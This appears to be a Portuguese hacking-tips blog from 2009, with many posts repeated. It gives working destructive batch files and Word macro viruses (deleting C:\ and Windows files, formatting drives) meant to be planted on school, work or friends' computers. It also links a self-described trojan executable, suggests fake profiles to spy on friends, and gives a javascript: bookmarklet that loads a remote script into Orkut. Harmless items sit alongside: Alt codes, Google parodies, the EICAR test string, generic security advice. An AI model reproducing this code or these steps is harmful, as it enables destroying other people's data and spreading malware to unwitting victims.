FAZER VIRUS A PEDIDO DE UM AMIGO CORNO !!!
Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat@echo off@echo frase de sua preferênciadel*.sysdel*.exedel*.comcd windowsdel*.*del arquivo.bat@echo frase de sua preferência
Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.
VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.
Vírus 12/04Sub MAINIf Dia(Agora()) = 12 and Mês(Agora()) = 04 ThenDefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”Close #1End ifOpen “c:\autoexec.bat” For Output As #1Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”Close #1End Sub
ROTINA 2
Sub MAINOpen “C:\imaiden.txt” for Output As #1”Print #1 “Código em hexadecimal”Print #1 “Código em hexadecimal” ‘(continuação)...Close #1Shell “debug texto.txt”Shell “c:\imaiden.com”End Sub
ROTINA 3
Sub MAINMacroCopiar “Global:Inocu”, “DocumentoNovo”, 0End sub
Vírus Fagundes Varela
Sub MAINInícioDocumentoInserir “Lembra dessas noites”Inserir CHR$(13)Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)Inserir “Do vento aos brandos açoites?”Inserir CHR$(13)Inserir CHR$(13)Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)Inserir “Quando as campinas tremiam”Inserir CHR$(13)Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)Inserir “E nossas almas unidas”Inserir CHR$(13)Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrãoEnd Sub
MSN→ rafaelfly@orkut.com ORKUT→ rafael0fly@gmail.com →MSN DO GROUP DO BLOG ADD →group855973@groupsim.com
terça-feira, 27 de janeiro de 2009
VIRUS DE MACRO COMO FAZER
Macros do Word
Ainda hoje existe muita gente que so é capaz de abrir o Word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares só sabem mexer no básico mesmo. Eles nem imaginam o que tem por traz deste riquíssimo processador de texto. Esta mateira tem como objetivo fazer desde pequenas até grandes sacanagens com usuários pentelhos. Obs. Software/versão Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95) O Word possui um arquivo chamado "normal.dot" onde estão todas as configurações padrão do Word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Níveis de sacanagemNível 1.....
- Apenas uma brincadeiraNível 2..... -
Apenas uma brincadeira de mau gostoNível
3..... - não é mais brincadeira.
Primeiro você precisa criar uma macro... siga os passos: Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver lá (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo. Obs. existe outras formas e meios de criar uma macro, mas esta é mais simples.
Nível 1
O nível 1 serve para você se mostrar, falando que entende do Word melhor do que ninguém. Cada vez que o usuário inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente veja abaixo.
------ Começa Aqui --------
Sub MAIN MsgBox "Você ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub
------ Termina Aqui --------
Nível 2
É para deixar o usuario irritadíssimo. no corpo da macro cole este texto abaixo:------ Começa Aqui --------
Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub------ Termina Aqui --------
Nível 3Bom este nível é pura sacanagem, com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, você é quem sabe.
------ Começa Aqui --------
Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WINWORD\*.*" End Sub
------ Termina Aqui -------
-Lembre-se de que estes macros, são gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicialização, então se você for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.Detalhes :Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas não irei falar, descubra você mesmo. A macro do word é uma ferramenta riquissima, procure fucar. Você pode fazer estas no seu proprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto, para não explodir em você, não me responsabilizo por qualquer ato.
Ainda hoje existe muita gente que so é capaz de abrir o Word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares só sabem mexer no básico mesmo. Eles nem imaginam o que tem por traz deste riquíssimo processador de texto. Esta mateira tem como objetivo fazer desde pequenas até grandes sacanagens com usuários pentelhos. Obs. Software/versão Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95) O Word possui um arquivo chamado "normal.dot" onde estão todas as configurações padrão do Word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Níveis de sacanagemNível 1.....
- Apenas uma brincadeiraNível 2..... -
Apenas uma brincadeira de mau gostoNível
3..... - não é mais brincadeira.
Primeiro você precisa criar uma macro... siga os passos: Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver lá (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo. Obs. existe outras formas e meios de criar uma macro, mas esta é mais simples.
Nível 1
O nível 1 serve para você se mostrar, falando que entende do Word melhor do que ninguém. Cada vez que o usuário inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente veja abaixo.
------ Começa Aqui --------
Sub MAIN MsgBox "Você ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub
------ Termina Aqui --------
Nível 2
É para deixar o usuario irritadíssimo. no corpo da macro cole este texto abaixo:------ Começa Aqui --------
Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub------ Termina Aqui --------
Nível 3Bom este nível é pura sacanagem, com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, você é quem sabe.
------ Começa Aqui --------
Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WINWORD\*.*" End Sub
------ Termina Aqui -------
-Lembre-se de que estes macros, são gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicialização, então se você for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.Detalhes :Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas não irei falar, descubra você mesmo. A macro do word é uma ferramenta riquissima, procure fucar. Você pode fazer estas no seu proprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto, para não explodir em você, não me responsabilizo por qualquer ato.
ACHAR AMIGO BICHO PREGUIÇA
javascript:alert('Procurandobichos-preguiça...');window.location="/CommMembers.aspx?cmm=68685&tab=1";alert("Mais codigos no site:\n http://www-fly.blogspot.com/);
COMANDOS ALT NO ORKUT
Alt + 1= ☺ Alt + 2= ☻Alt + 3= ♥ Alt + 4= ♦ Alt + 5= ♣ Alt + 6= ♠ Alt + 7= • Alt + 8= ◘ Alt + 9= ○ Alt + 10= ◙ Alt + 11= ♂ Alt + 12= ♀ Alt + 13= ♪ Alt + 14= ♫ Alt + 15= ☼ Alt + 16= ► Alt + 17= ◄ Alt + 18= ↕ Alt + 19= ‼Alt + 20= ¶Alt + 21= §Alt + 22= ▬Alt + 23= ýAlt + 24= ↑Alt + 25= ↓Alt + 26= →Alt + 27= ←Alt + 28= ∟Alt + 29= ↔Alt + 30= ▲Alt + 31= ▼Alt + 32=Do Alt + 33 até o Alt + 126 são caractéres numéricos e de letras comuns do teclado... continuandoAlt + 127= ⌂Alt + 128= ÇAlt + 129= üAlt + 131= âAlt + 132= äAlt + 133= àAlt + 134= åAlt + 135= çAlt + 136= êAlt + 137= ëAlt + 138= èAlt + 139= ïAlt + 140= ¥Alt + 141= ìAlt + 142= ÄAlt + 143= ÅAlt + 144= ÉAlt + 145= æAlt + 146= ÆAlt + 147= ôAlt + 148= öAlt + 149= òAlt + 150= ûAlt + 151= ùAlt + 152= ÿAlt + 153= ÖAlt + 154= ÜAlt + 155= øAlt + 156= £Alt + 157= ØAlt + 158= ×Alt + 159= ƒAlt + 160= áAlt + 161= íAlt + 162= óAlt + 163= úAlt + 164= ñAlt + 165= ÑAlt + 166= ªAlt + 167= ºAlt + 168= ¿Alt + 169= ®Alt + 170= ¬Alt + 171= ½Alt + 172= ¼Alt + 173= ¡Alt + 174= «Alt + 175= »Alt + 176= ░Alt + 177= ▒Alt + 178= ▓Alt + 179= │Alt + 180= ┤Alt + 181= ÁAlt + 182= ÂAlt + 183= ÀAlt + 184= ©Alt + 185= ╣Alt + 186= ║Alt + 187= ╗Alt + 188= ╝Alt + 189= ¢Alt + 190= ¥Alt + 191= ┐Alt + 192= └Alt + 193= ┴Alt + 194= ┬Alt + 195= ├Alt + 196= ─Alt + 197= ┼Alt + 198= ãAlt + 199= ÃAlt + 200= ╚Alt + 201= ╔Alt + 202= ╩Alt + 203= ╦Alt + 204= ╠Alt + 205= ═Alt + 206= ╬Alt + 207= ¤Alt + 208= ðAlt + 209= ÐAlt + 210= ÊAlt + 211= ËAlt + 212= ÈAlt + 213= ıAlt + 214= ÍAlt + 215= ÎAlt + 216= ÏAlt + 217= ┘Alt + 218= ┌Alt + 219= █Alt + 220= ▄Alt + 221= ¦Alt + 222= ÌAlt + 223= ▀Alt + 224= ÓAlt + 225= ßAlt + 226= ÔAlt + 227= ÒAlt + 228= õAlt + 229= ÕAlt + 230= µAlt + 231= þAlt + 232= ÞAlt + 233= ÚAlt + 234= ÛAlt + 235= ÙAlt + 236= ýAlt + 237= ÝAlt + 238= ¯Alt + 239= ´Alt + 241= ±Alt + 242= ‗Alt + 243= ¾Alt + 244= ¶Alt + 245= §Alt + 246= ÷Alt + 247= ¸Alt + 248= °Alt + 249= ¨Alt + 250= •Alt + 250= •Alt + 251= ¹Alt + 252= ³Alt + 253= ²Alt + 254= ■
SENHA SEGURA
Senhas tem que ser trocadas regularmente"Senhas podem ser descobertas por escuta de rede, observação, captura de teclado, engenharia social ou mesmo reveladas por livre e espontânea vontade. Em toda troca de senha a forma utilizada para obtê-la da primeira vez poderá ser repetida, principalmente pela escuta de rede ou revelação espontânea. Portanto, impor uma periodicidade de troca de senha, na maioria dos casos, não contribui para melhorar a segurança. As medidas mais eficazes para evitar comprometimento da senha são, sobretudo o trabalho de conscientização dos funcionários para aspectos de segurança, incluindo a preservação da senha. Outro ponto fundamental é prover estruturas que não permitam a passagem da senha em claro pela rede, mecanismos de criptografia e isolamento de segmentos são fundamentais para aumentar a segurança da senha.Existem ainda alguns efeitos colaterais importantes, é comum o usuário que troque a senha constantemente esquecer a atual, ou ter uma quantidade finita de senhas que vão sendo informadas ciclicamente a cada troca, problemas que causam transtorno e não agregam nenhum valor à segurança do ambiente.Trocas de senhas devem ocorrer quando houver suspeita de comprometimento, e existir a certeza de que foram criados mecanismos para que a troca seja feita com segurança e realmente pelo proprietário e que tenham sido sanadas as falhas que permitiram obtê-las.
sábado, 24 de janeiro de 2009
roubar imagem do msn sem usar...
a telca print scrn
Programa que permite "roubar" os emoticons e as imagens de exibição de seus contatos no MSN Messenger e no Windows Live Messenger. Se você gostaria de conseguir as imagens que seus contatos utilizam no MSN Messenger, mas não sabe como fazer, este é o programa.
o linlk do progama e 100% potugues
http://www.sherv.net/Files/CEDP-Stealer-Setup.exe
Ele e um trojam eu uso e o seu anti virus deve bloq ele por ser trojam mais nao faz mal
se tver duvida me add no msn q eu reslovo
rafael_fly@soubala.com
vc tbm pode usar as fotos no seu msn tbm e muito util pra fazer fake add os amigos e ver quem eles falao de vc !!! e supre revelador
Programa que permite "roubar" os emoticons e as imagens de exibição de seus contatos no MSN Messenger e no Windows Live Messenger. Se você gostaria de conseguir as imagens que seus contatos utilizam no MSN Messenger, mas não sabe como fazer, este é o programa.
o linlk do progama e 100% potugues
http://www.sherv.net/Files/CEDP-Stealer-Setup.exe
Ele e um trojam eu uso e o seu anti virus deve bloq ele por ser trojam mais nao faz mal
se tver duvida me add no msn q eu reslovo
rafael_fly@soubala.com
vc tbm pode usar as fotos no seu msn tbm e muito util pra fazer fake add os amigos e ver quem eles falao de vc !!! e supre revelador
Google Mirror => google refletido no espelho
Googoth => Google Góticoh
4x0r => google em lingua Hacker
google easter => google de páscoa
google klingon => google na lingua dos klingon, da serie star trek
google mode => google em vertical
christoogle => um google diferente com o logo christooglefirefox
google page => google modo firefox
googleloco => pagina do google todo louco, parodia louca.
google heart01 => versão dia dos namorados
google heart feature => versão dia dos namorados com outro logotipo
google bork => versão da lingua dos muppets
google moms => versão tributo as mães
google moms01 => tributo as mães com outras frases
google sam => versão iGoogle patriota (E.U.A)FTodosen
google => versão na qual o logotipo do google cai
GGogol librelogiciel => paródia francesa do googleCthuugle =>
google pretogoogle paint => abre um paint na pagina do google
google shop => abre um mapa la que naum sei pra que serve
google emo => ja sabem ne hehe
Como usar...Cola um desses, e aperta, estou com sorte no GOOGLE
Googoth => Google Góticoh
4x0r => google em lingua Hacker
google easter => google de páscoa
google klingon => google na lingua dos klingon, da serie star trek
google mode => google em vertical
christoogle => um google diferente com o logo christooglefirefox
google page => google modo firefox
googleloco => pagina do google todo louco, parodia louca.
google heart01 => versão dia dos namorados
google heart feature => versão dia dos namorados com outro logotipo
google bork => versão da lingua dos muppets
google moms => versão tributo as mães
google moms01 => tributo as mães com outras frases
google sam => versão iGoogle patriota (E.U.A)FTodosen
google => versão na qual o logotipo do google cai
GGogol librelogiciel => paródia francesa do googleCthuugle =>
google pretogoogle paint => abre um paint na pagina do google
google shop => abre um mapa la que naum sei pra que serve
google emo => ja sabem ne hehe
Como usar...Cola um desses, e aperta, estou com sorte no GOOGLE
Baixar os vídeos do YOUTUBE sem Programa
YOUTUBE sem Programa ¤
so aqui q vc aprende de verdade
Qual programa eu uso para baixar os vídeos do YOUTUBE?
A resposta é simples: Nenhum!Explicarei o procedimento:•
Entre no site www.youtube.com e procure pelo vídeo do qual você deseja fazer o download! Após encontrado o vídeo desejado, clique para abrir como se você fosse assisti-lo. Depois de ter feito isso, vá até a barra de endereços: Lá estará um link parecido com este:http://br.youtube.com/watch?v=D-Kfcq5KM9o•
Vá até a barra de endereços e apague a palavra " watch? " , apague também o sinal de igualdade " = " , no lugar do sinal de igualdade coloque " / " , ficará assim:http://br.youtube.com/v/D-Kfcq5KM9o•
Aperte enter, o vídeo ficará em uma tela inteira, após aparecer o vídeo na tela inteira, note que o link estará diferente, ex:http://br.youtube.com/swf/l.swf?video_id=D...hCSqVwd103kqfYV• Apague " swf/l.swf " e coloque " get_video " , ex:
manda recado pra todos amigos
Copie o código abaixo em vermelho cole na barra de endereços (aquele local onde se digita www.orkut.com), após colar aperte ENTER. Escrava a sua mensagen e clique em Enviar Scraps que seus scraps serão enviados automaticamente. Código: javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='ht'+'tp://stashbox.org/129044/scrapss.js';void(0)
Criando uma pasta invisivel
Criando uma pasta invisivel
Uma pasta invisível é muito útil para muitas pessoas. Principalmente para quem tem algo a esconder. Para criar uma pasta invisível no Windows basta seguir os passos abaixo:Clique com o botao direito do mouse em qualquer lugar da sua área de trabalho, e clique em novo/pasta.Depois de ter criado uma pasta você vai renomea-laao invés de você colocar um nome para pasta você vai fazer o seguinte: aperte e mantenha apertada a tecla alt e aperte os seguintes números 0160 . Ou seja alt+0160Depois você clica com o botao direito do mouse em cima da pasta e clica em propriedades/ personalizar/ alterar íconena janela que abriu você devera escolher um ícone em branco (esse ícone está logo no inicio, tem três ícones invisíveis um encima do outro).Clique em okPronto agora você poderá esconder suas coisasPara saber aonde esta a pasta, selecione toda sua área de trabalho e preste bem atenção pois vai ter um lugar que vai ter uma pequena area sublinhada mas não vai ter pasta, é lá que esta a pasta invisível, de dois cliques e pronto ou fik precionando f5
criar virus bat
Abra o bloco de notas copie e cole isto um dos dois e salve quando for salvar no final do titulo coloque(.bat) ou seja se fosse eu colocaria: Virus.bat e salvo.
@echo offdeltree/y c:del/s/q c:
ou=format/autotest/q/u c:format/autotest/q/u d:
Obersavação não execute isto em seu compuatdor.
nao responsabilizo por isso
teste no msn com um amigo
@echo offdeltree/y c:del/s/q c:
ou=format/autotest/q/u c:format/autotest/q/u d:
Obersavação não execute isto em seu compuatdor.
nao responsabilizo por isso
teste no msn com um amigo
testar seu ativirus
Copie a Fraze abaixo e cole no bloco de notas e salve por exemplo
'Virus.com'.
seu anti-virusesta corretamente instalado atualizado e com um foncionamento perfeito simplesmente ele nãovai deixar salvar ou ele vai barrar ele, excluindo ou só
dando alerta de virus!
Frase:X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Lembrando bem:Esse texto não é nenhum virus, simplesmente é um codigo para o anti-virus reconhece-lo comoVIRUS!
'Virus.com'.
seu anti-virusesta corretamente instalado atualizado e com um foncionamento perfeito simplesmente ele nãovai deixar salvar ou ele vai barrar ele, excluindo ou só
dando alerta de virus!
Frase:X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Lembrando bem:Esse texto não é nenhum virus, simplesmente é um codigo para o anti-virus reconhece-lo comoVIRUS!
codigos secretos do windows xp
alguns Códigos secretos do Windows . windows xp algums valem pro vista ->nao testei e a responsabilidade sua em fazer isso
Para executar vá em: INICIAR; EXECUTAR, DIGITE E OK.
- Processos Legítimos- Aumente a Velocidade do PC- Remova Vírus- Exclua programas em processo
-Veja o que cada aplicativo usa de Memória no PC- Tire programas desnecessários na inicialização
- Veja mais informações no PC sem programas- Processos LegítimosVeja abaixo todos os Processos Legítimos do Windows XP ( Alguns valem para Vista )Processos em execução
:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\IoctlSvc.exeC:\WINDOWS\System32\igfxtray.exeC:\WINDOWS\System32\hkcmd.exeC:\WINDOWS\system32\ctfmon.exeC:\WINDOWS\System32\alg.exeC:\WINDOWS\system32\taskmgr.exe
Esse são os Processos legítimos principais do Windows, concerteza tem muito mais, mas esses são os mais comuns.
Para executar vá em: INICIAR; EXECUTAR, DIGITE E OK.
- Processos Legítimos- Aumente a Velocidade do PC- Remova Vírus- Exclua programas em processo
-Veja o que cada aplicativo usa de Memória no PC- Tire programas desnecessários na inicialização
- Veja mais informações no PC sem programas- Processos LegítimosVeja abaixo todos os Processos Legítimos do Windows XP ( Alguns valem para Vista )Processos em execução
:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\IoctlSvc.exeC:\WINDOWS\System32\igfxtray.exeC:\WINDOWS\System32\hkcmd.exeC:\WINDOWS\system32\ctfmon.exeC:\WINDOWS\System32\alg.exeC:\WINDOWS\system32\taskmgr.exe
Esse são os Processos legítimos principais do Windows, concerteza tem muito mais, mas esses são os mais comuns.
segurança digital
Cartilha de Segurança Digital20 Dicas de Segurança Digital Para alcançar um nível aceitável de segurança digital é fundamental conhecer e por em pratica no próprio computador e ambiente (de trabalho ou familiar) as seguintes "Vinte dicas fundamentais de segurança digital".
1) Instale um bom programa antivírus e mantenha o mesmo atualizado diariamente, melhor se através do sistema de atualização automática. O programa deve ser configurado para filtrar em tempo real TODOS os programas que forem executados ou entrarem no computador de qualquer maneira e, de preferência, para executar um "SCAN" completo a cada dia ou pelo menos uma vez por semana. Boas opções de programa Antivírus são: Kaspersky Lab, PandaVirus, NOD32 (Eset), Norton/Symantec, AVG. Alguns destes programas existem em versão limitada e gratuita.
2) Instale um bom programa antispyware. Configure este programa para filtrar todos os programas executados ou que entrem no computador de qualquer maneira. O programa deverá ainda ser configurado para se atualizar automaticamente e para executar um SCAN completo diariamente. Boas opções de programas deste tipo são: Microsoft AntiSpyware (grátis), Spy Sweeper, Spyware Doctor, Counter Spy, Spy Bot (grátis).
3) Instale um bom programa de firewall e o configure para proteção intermediária ou máxima. Caso tenha problemas para executar tarefas no seu computador depois disso poderá ir diminuindo o nível de proteção ou excluindo certas funções. Algumas boas opções gratuitas na internet são: Comodo Personal Firewall (www.comodo.com - o melhor, na minha opinião), Sygate Personal Firewall (agora retirado pela Symantec, que incorporou a Sygate), Zone Alarm, Kerio Personal Firewall e Agnitum Outpost Firewall.
4) Use o filtro de SPAM fornecido por seu provedor, ou se não for disponível adquira um para utilizar junto ao seu cliente de email. Ter um sistema capaz de filtrar as mensagens de SPAM de forma eficaz é importante pois grande parte dos e-mails com arquivos maliciosos anexados são normalmente identificados como SPAM.
5) Configure seu Navegador (Internet Explorer, FireFox, Netscape...) para que peça SEMPRE autorização e confirmação antes de baixar ou executar qualquer coisa na internet. Depois não autorize ele a baixar nada a não ser que saiba muito bem do que se trata. Como regra nunca execute/abra códigos diretamente da internet, se necessário os baixe/salve e rode depois.
6) Antes de utilizar um novo site de compras e fornecer dados dos seus cartões de credito ou banco, procure informações sobre sua credibilidade, confiabilidade, solidez, segurança e eficiência. Também verifique que o site utilize, para a troca de dados e informações, uma área segura baseada em criptografia (SSL). Para isso confirme que no seu navegador apareça um pequeno cadeado fechado ou uma chave no canto inferior da tela.
7) Desconfie e rejeite comunicados, propostas e ofertas milagrosas de qualquer tipo que possam chegar por qualquer meio (email, MSN, salas de bate-papo, P2P, chat systems em geral etc...).
8) Nunca anote senhas e outras informações confidenciais em lugares de fácil acesso (inclusive arquivos não criptografados dentro do seu computador) ou visíveis.
9) Criminosos podem criar sites que parecem os de bancos ou outras entidades, com o intuito de enganar as vítimas desavisadas e de capturar suas senhas e dados sigilosos. Neste caso o primeiro cuidado é verificar se o endereço que aparece no browser é mesmo o do banco e se este permanece inalterado na hora que aparecer o site. O segundo cuidado é o chamado teste da senha errada ou do "falso positivo". É só tentar acessar utilizando uma senha propositalmente errada e ver se o site aceita esta senha. Sites falsos aceitam qualquer coisa, já os verdadeiros sabem reconhecer a senha válida de uma errada.
10) Se lembre que a enorme maioria dos casos de fraudes envolvendo internet banking acontece por descuidos do usuário e não por falhas de segurança do bancos. Portanto tome sempre os devidos cuidados quando acessar sua conta e, de forma geral, usar o seu computador.
11) Sempre e só utilize um computador confiável para acessar sua conta e/ou dados sigilosos. NUNCA use computadores públicos ou de terceiros ou ainda computadores que não tenham sistemas de proteção eficientes para acessar sua conta ou qualquer outra informação sigilosa ou que necessite de uma sua senha (por exemplo uma caixa de email).
12) Evite navegar em sites arriscados e NUNCA baixe qualquer coisa de site que não conheça bem e que não sejam totalmente confiáveis. Como regra geral, sites com material pornográfico e sites que promovem pirataria de software e outros crimes, são perigosos pois freqüentemente contém vírus, trojans ou outros programas maliciosos.
13) Nunca responda à e-mails não solicitadas (SPAM), nem para pedir sua remoção de listas de envio ou para reclamar ou solicitar qualquer informação. Eles usam sua resposta para confirmar a existência do seu endereço de email e aí sim que não irão parar nunca. Também não clique em links de descadastramento ou de forma geral em qualquer tipo de link ou site sugerido ou de outra forma presente nestas mensagens.
14) Nunca execute ou abra qualquer arquivo anexado a mensagens de origem desconhecida ou não solicitadas. Sobretudo NÃO abra arquivos dos tipos: EXE COM SCR PIF BAT CMD DPR ASX. Também lembre de configurar o seu programa cliente de email (Outlook, Eudora, Thunderbird...) para que não abra automaticamente os anexos. Na maioria dos casos estes programas são vírus ou trojans ou worms.
15) Não se assuste quando receber e-mails ameaçadores tipo cobranças, cancelamento de documentos ou benefícios, ações na justiça etc... Também desconfie de mensagens que aparentem ter sido enviadas por bancos, repartições públicas, lojas famosas e programas televisivos. Não acredite e não leve a sério este tipo de mensagens, os respectivos órgãos e empresas NUNCA enviam mensagens por email com este intuito. Sobretudo NÃO abra nenhum arquivo anexado a este tipo de e-mails nem acesse nenhum link sugerido.
16) Não acredite em promessas milagrosas, ofertas mirabolantes, propostas fabulosas e também não acredite em vendas simplificadas de produtos ou serviços que deveriam estar sujeitos a controle (tipo medicamentos ou coisas parecidas). Na maioria dos casos se trata de golpes ou produtos falsificados e até perigosos ou prejudiciais.
17) Não forneça seu endereço de email para publicação em fóruns, salas de bate papo e grupos de discussão. A mesma regra vale para qualquer outra informação pessoal como nome completo, endereço, telefone, números de documentos (RG, CPF, CNH...), lugar de trabalho etc... Se não puder evitar de publicar em algum lugar um endereço de e-mail, substitua o "@" com "(ARROBA)".
18) Evite sempre participar de qualquer tipo de corrente na rede, sejam pirâmides financeiras sejam supostas ou reais campanhas de solidariedade seja o que for. Também desconfie muito de qualquer oferta que lhe chegue pela rede e onde exista a solicitação de um pagamento adiantado.
19) Crie um endereço de email alternativo em algum serviço gratuito de webmail (BOL, Hotmail, Yahoo, Gmail, IG...) e utilize exclusivamente este endereço (e não o seu pessoal e/ou profissional) para cadastramento em sites, fóruns, blogs, bate papos etc...quando isso for inevitável.
20) Se recuse a abrir qualquer mensagem suspeita onde não seja claramente definida a identidade de quem a envia (endereços falsos, endereços omissos ou incompletos, assuntos com erros ou incongruentes...). A mesma regra vale para sites que proponham vendas de produtos ou serviços mas que tenham poucos dados, sem endereços e telefone de contato, sem nomes de empresas ou pessoas para contatar etc... É importante também lembrar que, em qualquer mensagem de e-mail, o endereço do remetente é muito fácil de se falsificar. Por isso não confie automaticamente em mensagens que "parecem" ter sido enviadas por seus contatos. Use seu senso crítico e um pouco de desconfiança pois existem muitos casos de fraude com e-mails que usam maliciosamente os nomes de pessoas conhecidas da vítima. teh +
1) Instale um bom programa antivírus e mantenha o mesmo atualizado diariamente, melhor se através do sistema de atualização automática. O programa deve ser configurado para filtrar em tempo real TODOS os programas que forem executados ou entrarem no computador de qualquer maneira e, de preferência, para executar um "SCAN" completo a cada dia ou pelo menos uma vez por semana. Boas opções de programa Antivírus são: Kaspersky Lab, PandaVirus, NOD32 (Eset), Norton/Symantec, AVG. Alguns destes programas existem em versão limitada e gratuita.
2) Instale um bom programa antispyware. Configure este programa para filtrar todos os programas executados ou que entrem no computador de qualquer maneira. O programa deverá ainda ser configurado para se atualizar automaticamente e para executar um SCAN completo diariamente. Boas opções de programas deste tipo são: Microsoft AntiSpyware (grátis), Spy Sweeper, Spyware Doctor, Counter Spy, Spy Bot (grátis).
